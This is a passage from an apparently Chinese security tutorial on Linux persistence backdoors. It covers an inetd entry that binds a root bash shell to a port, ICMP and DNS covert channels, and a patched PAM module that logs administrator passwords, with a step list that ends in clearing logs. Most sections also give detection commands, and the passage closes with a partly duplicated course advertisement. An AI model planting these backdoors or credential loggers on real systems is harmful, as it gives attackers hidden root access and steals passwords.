woot 6666/tcp #evil backdoor service
然后修改/etc/inetd.conf :
woot stream tcp nowait root /bin/bash bash -i
我们可以修改成一些常见的端口,以实现隐藏。
其实 /etc/shadow文件,爆破root的密码才最保险啊
检测:查看配置文件即可
cat /etc/inetd.conf
## 7.**.****协议后门**
在一些访问控制做的比较严格的环境中,由内到外的
TCP
流量会被阻断掉。但是对于
UDP(DNS
、
ICMP) 相关流量通常不会拦截。
**ICMP**
主要原理就是利用
ICMP
中可控的
data
字段进行数据传输
**DNS**
在大多数的网络里环境中
IPS/IDS
或者硬件防火墙都不会监控和过滤
DNS
流量。主要原理就是将后门载荷 隐藏在拥有PTR
记录和
A
记录的
DNS
域中(也可以利用
AAAA
记录和
IPv6
地址传输后门)。
协议后门检测:对于
DNS/ICMP
这种协议后门,直接查看网络连接即可,因为在使用过程中会产生大量 的网络连接
清除:
kill
进程、删除文件即可
## 8.**PAM****后门**
PAM
使用配置
/etc/pam.d/
下的文件来管理认证方式,应用程序调用相应的配置文件,以加载动态库的 形式调用 /lib/security
下的模块。
PAM
配置可分为四个参数
:
模块类型、控制标记、模块路径、模块参数,例如
: session required
pam\_selinux.so open
上面提到的
sshd
软链接后门利用的
PAM
机制达到任意密码登录,还有一种方式是键盘记录。原理主要是通过 pam\_unix\_auth.c
打补丁的方式潜入到正常的
pam
模块中,以此来记录管理员的帐号密码。
利用步骤:复制
patch
到源代码目录
>>>
打
patch >>>
编译
>>>
将生成的
pam\_uninx.so
文件覆盖 到/lib/secruity/pam\_unix.so
下
>>>
修改文件属性
>>>
建立密码保存文件,并设置好相关的权限
>>>
清理日志 >>> ok
#确保ssh开启pam支持
vim /etc/ssh/sshd_config
UsePAM yes
#自动化脚本
https://github.com/litsand/shell/blob/master/pam.sh
检测:
1、通过Strace跟踪ssh
ps axu | grep sshd
strace -o aa -ff -p PID
grep open aa* | grep -v -e No -e null -e denied| grep WR
2、检查pam_unix.so的修改时间
stat /lib/security/pam_unix.so #32位
stat /lib64/security/pam_unix.so #64位
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
621
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
